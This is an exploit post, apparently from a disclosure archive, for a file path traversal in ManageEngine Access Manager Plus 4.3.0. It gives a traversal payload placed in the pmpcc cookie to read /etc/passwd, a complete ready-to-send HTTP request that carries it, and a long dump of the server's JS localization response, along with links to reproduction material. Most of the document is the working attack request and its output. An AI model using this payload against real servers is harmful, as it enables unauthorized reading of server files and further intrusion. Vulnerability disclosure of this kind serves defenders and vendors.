<pre><code>## Exploit Title: ManageEngine Access Manager Plus 4.3.0 - File-path-traversal<br />## Author: nu11secur1ty<br />## Date: 11.22.2023<br />## Vendor: https://www.manageengine.com/<br />## Software: https://www.manageengine.com/privileged-session-management/download.html<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/ManageEngine/Access-Manager-Plus-version-4.3-(Build-4309)<br /><br />## Description:<br />The `pmpcc` cookie is vulnerable to path traversal attacks, enabling<br />read access to arbitrary files on the server.<br />The testing payload<br />..././..././..././..././..././..././..././..././..././..././etc/passwd<br />was submitted in the pmpcc cookie.<br />The requested file was returned in the application's response.<br />The attacker easy can see all the JS structures of the server and can<br />perform very dangerous actions.<br /><br />## STATUS: HIGH Vulnerability<br /><br />[+] Exploits:<br />```GET<br />GET /amp/webapi/?requestType=GET_AMP_JS_VALUES HTTP/1.1<br />Host: localhost:9292<br />Accept-Encoding: gzip, deflate<br />Accept: */*<br />Accept-Language: en-US;q=0.9,en;q=0.8<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)<br />AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107<br />Safari/537.36<br />Connection: close<br />Cache-Control: max-age=0<br />Cookie: pmpcc=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd;<br />_zcsr_tmp=41143b42-8ff3-4fb0-8b30-688f63f9bf9a;<br />JSESSIONID=2D2DB63E708680CBC717A8A165CE1D6E;<br />JSESSIONIDSSO=314212F36F55D2CE1E7A76F98800E194<br />Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"<br />Sec-CH-UA-Mobile: ?0<br />X-Requested-With: XMLHttpRequest<br />Sec-CH-UA-Platform: Windows<br />Referer: https://localhost:9292/AMPHome.html<br />```<br /><br />[+] Response:<br /><br />```<br />,'js.pmp.helpCertRequest.subcontent10':'The issued certificate is<br />e-mailed to the user who raises the request, the user who closes the<br />request and also to those e-mail ids specified at the time of closing<br />the request.'<br />,'js.admin.HelpDeskIntegrate.UsernameEgServiceNow':'ServiceNow login username'<br />,'js.PassTrixMainTab.ActiveDirectory.next_schedule_time':'Next<br />synchronization is scheduled to run on'<br />,'js.agent.csharp_Windows_Agent':'C# Windows Agent'<br />,'js.PassTrixMainTab.in_sec':'Seconds'<br />,'godaddy.importcsr.selectfileorpastecontent':'Either select a file or<br />paste the CSR content.'<br />,'js.connection.colors':'Colors'<br />,'js.general.ShareToGroups':'Share resource to user groups'<br />,'js.connection.mapdisk':'Drives'<br />,'jsp.admin.Support.User_Forums':'User Forums'<br />,'js.general.CreateResource.Dns_url_check':'Enter a valid URL . For<br />cloud services (Rackspace and AWS IAM), the DNS name <br>looks like a<br />URL (ex: https:\/\/identity.api.rackspacecloud.com\/v2.0)'<br />,'js.admin.RPA_Integration.About':'PAM360 renders bots that seamlessly<br />integrate and perfectly fit into the pre-designed and automated<br />integrations of the below listed RPA-powered platforms, to simulate<br />the routine manual password retrieval from the PAM360 vault.'<br />,'js.discovery.loadhostnamefromfile':'From file'<br />,'js.AddListenerDetails.Please_enter_valid_implementation_class':'Please<br />enter a valid Implementation Class'<br />,'js.general.GroupedResources':'Grouped Resources'<br />,'js.general.SlaveServer':'This operation is not permitted in Secondary Server.'<br />,'PROCESSID':'Process Id'<br />,'js.resources.serviceaccount.SupportedSAccounts.Services_fetched_successfully':'Services<br />fetched successfully'<br />,'assign.defaultdns.nodnsconfigured':'No default DNS available\/enabled'<br />,'js.commonstr.search':'Search'<br />,'js.discovery.usercredential_type':'Credential Type'<br />,'jsp.admin.GeneralSetting.Check_high_availability_status_for':'Check<br />high availability status every <input type=\"text\" class=\"txtbox\"<br />name=\"check_duration\" value=\"{0}\" size=\"5\" maxlength=\"5\"<br />style=\"width:60px\" onkeypress=\"if(event.keyCode==13)return false;\"<br />> minutes.'<br />,'pki.js.help.entervalidnumber':'Please enter a valid number for<br />Numeric Field Default Value.'<br />,'js.remoteapp.fetch':'Fetch'<br />,'js.admin.HighAvailability.configured_successfully':'Configured Successfully'<br />,'js.generalSettings_searchTerm_Password_reset':'Password Reset,<br />Reason for password reset, disable ticket id, waiting time, wait time<br />for service account password reset, linux unix password reset'<br />,'letsencrypt.enter.domainnames':'Enter domain names'<br />,'js.discovery.resourcetype':'Resource Type'<br />,'js.HomeTab.UserTab':'Set this tab as default view for \'Users\''<br />,'js.report.timeline.todate':'Valid To'<br />,'js.general_Language_Changed_Successfully':'Language Changed Successfully'<br />,'js.aws.credentials.label':'AWS Credential'<br />,'auditpurge.helpnote1':'Enter 0 or leave the field blank to disable<br />purging of audit trails.'<br />,'js.general.user.orgn_bulkManage':'Manage Organization'<br />,'js.rolename.SSH_KEY':'Create\/Add key'<br />,'js.admin.admin.singledbmultiserver.name':'Application Scaling'<br />,'lets.encrypt.requestreport':'Let\'s Encrypt Requests Report'<br />,'js.settings.breach_settings.disable_api':'Disable API Access'<br />,'js.cmd.delete.not_possible':'Command cannot be deleted as it is<br />already added to the following command set(s).'<br />,'js.settings.notification.domaincontent':'Notify if domains are<br />expiring within'<br />,'js.aws.searchuser':'--Search UserName--'<br />,'jsp.admin.GeneralSetting.helpdesk_conf':'Configure the ticketing<br />system settings in Admin >> General >> Ticketing System Integration.'<br />,'js.discovery.port':'Gateway Port'<br />,'usermanagement.showCertificates':'Show Certificates'<br />,'js.general.DestinationDirectoryCannotBeEmpty':'Destination directory<br />cannot be empty'<br />,'js.sshreport.title':'SSH Resource Report'<br />,'js.encryptionkey.update':'Update'<br />,'js.aws.regions':'Region'<br />,'js.settingsTitle1.UserManagement':'User Management'<br />,'js.passwordPolicy.setRange':'Enforce minimum or maximum password length'<br />,'js.commonstr.selectResources':'Select Resources'<br />,'RULENAME':'Rule Name'<br />,'jsp.admin.usergroups.AddUserGroupDialog.User_Group_added_successfully':'User<br />Group added successfully'<br />,'js.reports.SSHReports.title':'SSH Reports'<br />,'js.CommonStr.ValueIsLess':'value is less than 2'<br />,'js.discovery.discoverystatus':'Discovery Status'<br />,'js.settings.security_settings.Web_Access':'Web Access'<br />,'js.general.node_name_cannot_be_empty':'Node name cannot be empty'<br />,'js.deploy.audit':'Deploy Audit'<br />,'js.agentdiscovery.msca.title':'Microsoft Certificate Authority'<br />,'jsp.resources.AccessControlView.Choose_the_excluded_groups':'Nominate<br />user group(s) to exempt from access control.'<br />,'js.pki.SelectCertificateGroup':'Select Certificate Group(s)'<br />,'js.admin.HighAvailability.High_Availability_status':'Status'<br />,'settings.metracker.note0':'Disable ME Tracker if you do not wish to<br />allow ManageEngine to collect product usage details.'<br />,'SERVICENAME':'Service Name'<br />,'settings.metracker.note1':'Access Manager Plus server has to be<br />restarted for the changes to take effect.'<br />,'js.general.NewPinMismatch':'New PIN Mismatch'<br />,'js.HomeTab.ResourceTab':'Set this tab as default view for \'Resources\''<br />,'java.ScheduleUtil.minutes':'minutes'<br />,'js.admin.sdpop_change.tooltip':'Enabling this option will require<br />your users to provide valid Change IDs for the validation of password<br />access requests and other similar operations. Leaving this option<br />unchecked requires the users to submit valid Request IDs for<br />validation.'<br />,'js.privacy_settings.title.redact':'Redact'<br />,'js.admin.passwordrequests.Target_Resource_Selection_Alert':'Only 25<br />resources can be selected'<br />,'js.aboutpage.websitetitle':'Website'<br />,'js.customize.NumericField':'Numeric Field'<br />,'js.please.select.file':'Please select a file to upload.'<br />,'js.AutoLogon.Remote_connections':'Remote Connections'<br />,'pki.snmp.port':'Port'<br />,'java.dashboardutils.TODAY':'TODAY'<br />,'js.schedule.starttime':'Start Time'<br />,'js.ssh.keypassphrase':'Passphrase'<br />,'js.gettingstarted.keystore.step1.one':'Add keys to Access Manager Plus'<br />,'js.analytics.tab.ueba.msg4':'guide'<br />,'js.analytics.tab.ueba.msg5':'to complete the integration. For any<br />further questions, please write to us at<br />pam360-support@manageengine.com.'<br />,'js.reportType.Option7.UserAuditReport':'Audit Report'<br />,'js.common.csr':'CSR'<br />,'js.globalsign.reissue.order':'Reissue Order'<br />,'js.analytics.tab.ueba.msg6':'Build a platform of expected behavior<br />for individual users and entities by mapping different user accounts'<br />,'js.analytics.tab.ueba.msg7':'Verify actionable reports that<br />symbolize compromise with details about actual behavior and expected<br />behavior.'<br />,'js.resources.importcredential':'Import Credentials'<br />,'js.analytics.tab.ueba.msg1':'The Advanced Analytics module for<br />PAM360, offered via ManageEngine Log360 UEBA, analyzes logs from<br />different sources, including firewalls, routers, workstations,<br />databases, file servers and cloud services. Any deviation from normal<br />behavior is classified as a time, count, or pattern anomaly. It then<br />gives actionable insight to the IT Administrator with the use of risk<br />scores, anomaly trends, and intuitive reports.'<br />,'js.analytics.tab.ueba.msg2':'With Log360 UEBA analytics, you can:'<br />,'js.analytics.tab.ueba.msg3':'To activate Log360 UEBA for your PAM360<br />instance, download Log360 UEBA from the below link and follow the<br />instructions in this'<br />,'js.settingsTitle2.MailServer':'Mail Server'<br />,'jsp.admin.managekey.ChangeKey.Managing_the_PMP_encryption_key':'Managing<br />AMP Encryption Key'<br />,'settings.unmappedmails.email':'E-mail Address'<br />,'amp.connection.connection_type':'Connection Type'<br />,'js.analytics.tab.ueba.msg8':'Diagnose anomalous user behavior based<br />on activity time, count, and pattern.'<br />,'godaddy.contactphone':'Contact Phone'<br />,'js.general.HelpDeskIntegrate.ClassSameException':'Class name already<br />implemented. Implement with some other class.'<br />,'js.analytics.tab.ueba.msg9':'Track abnormal entity behaviors in<br />Windows devices, SQL servers, FTP servers, and network devices such as<br />routers, firewalls, and switches.'<br />,'js.rolename.freeCA.acme':'ACME'<br />,'digicert.label.dcv.cname':'CNAME Token'<br />,'js.helpcontent.createuser':'User Creation '<br />,'pgpkeys.key.details':'Key Information'<br />,'js.resources.discovery.ResourceDiscoveryStatus.discovery':'Discovery Status'<br />,'js.HomeTab.TaskAuditView':'Task Audit'<br />,'pki.js.certs.certGroupsSharedByUserGroups':'Certificate Groups<br />Shared With User Group(s)'<br />,'js.common.importcsr.format':'(File format should be .csr)'<br />,'js.notificationpolicy.Submit':'Save'<br />,'pmp.vct.User_Audit_Configuration':'User Audit Configuration'<br />...<br />...<br />...<br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/ManageEngine/Access-Manager-Plus-version-4.3-(Build-4309))<br /><br />## Reference:<br />[href](https://portswigger.net/kb/issues/00100300_file-path-traversal)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/scdzsb)<br /><br />## Time spent<br />`03:00:00`<br /><br /></code></pre>